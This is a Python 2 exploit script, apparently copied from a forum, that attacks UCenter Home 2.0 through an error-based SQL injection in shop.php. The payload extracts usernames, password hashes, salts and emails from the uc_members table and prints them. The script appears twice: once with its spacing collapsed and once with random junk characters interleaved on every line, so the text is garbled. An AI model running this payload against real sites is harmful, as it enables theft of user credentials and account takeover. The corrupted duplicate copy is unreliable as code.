#!/usr/bin/envpython importsys importurllib2 importre definfo(): print'From:http://www.exploit-db.com/exploits/14997/' print 'http://www.hake.cc/Web_loudong/' print'changed:qiaoy' print'exp:' print'./UCenter_Home_2.0.pysite' defmain(): ifl
, j8 D, \4 G4 v1 P: K! O
) h" O! `; o) ^" j v: j( U1 ?$ O& y3 |; r2 E8 Y
#!/usr/bin/env python & ^2 \; R7 B( G9 c. M9 ?
8 o, w# F; T! ~3 i0 G# z7 B6 Kimport sys ) n4 {* \, l" f/ Q5 e/ Q
import urllib2
, s- h' R. N- }. v: p5 y. @import re 4 n% a0 A0 J% p! S5 h
6 J" m5 ~! {8 u, J
def info(): 5 W9 ]8 ?; r5 B
print 'From:http://www.exploit-db.com/exploits/14997/'
& L0 O2 l1 [: h9 a' f' a. }& C print 'http://www.hake.cc/Web_loudong/'
3 Y8 {4 x1 d5 c, [& P- B print 'changed:qiaoy'
) }9 i% S/ K1 e- {9 v2 ~! i; k print 'exp:' $ J" p/ V# I3 g* y) g' I( E
print ' ./UCenter_Home_2.0.py site'
. m2 P- V0 M8 }$ c5 U, E 9 _2 l3 t J/ I8 ?" b$ l9 ~
def main(): % j/ E Z4 A {* _9 M7 Z, b8 |
if len(sys.argv) != 2:
: ]% w/ I2 `: E# e) r info() 6 f1 U* z. O* h
else:
2 }2 _5 ]' ?7 _+ n4 _2 [% [ site = sys.argv[1]
% w6 \) ^( c! X if site[0:7] == 'http://': $ Q; B# X4 O. m8 j- R0 a" E0 i
sitesite =site ( x7 [: u6 E# f
elif site[0:8] == 'https://': : C+ P7 m; ^9 T' y' I
sitesite = site 9 a0 }' G. A' E
else: B6 \: M3 U; V
site = 'http://'+site
. @0 Q" |% l6 v H9 @9 e" Q try:
- T3 U! \! N o8 h" ^4 B4 d url = site+'/shop.php?ac=view&shopid=50534+and+(select+1+from(select+count(*),concat((select+(select+(select+concat(0x7e,0x27,cast(concat(uid,0x3a,username,0x3a,password,0x3a,salt,0x3a,email)+as+char),0x27,0x7e)+from+ucenter.uc_members+LIMIT+0,1))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+11=1'
$ O( M# t# N8 [$ o6 J- A2 a Value = urllib2.urlopen(url).read()
- m$ X9 q9 O, p& ~7 [ M Msg = re.findall(r'Duplicate entry \'~\'(.*?)\' for key',Value)[0] 6 k2 R! j- \ ?% I% }
hacked = Msg.split(':') 6 T# f" }( |( u+ ?0 e% t
print 'Name: '+hacked[1]
- B, s$ z: m8 y' _' N& }! N print 'Passwd: '+hacked[2] $ m/ _$ R6 h- p. a# z+ m C4 U
print 'salt: '+hacked[3]
7 B# q! L# N5 n3 n' T; s print 'email: '+hacked[4]
* Y& F/ C$ R5 { except:
/ o# T2 C9 }/ a$ ?, Q print 'Sorry,I can\'t work............'
3 r9 o5 x- O% E5 [$ L
# n# v' g2 V) x+ B5 [( }if __name__ == '__main__': 4 V3 k, p3 @ E4 R
main() |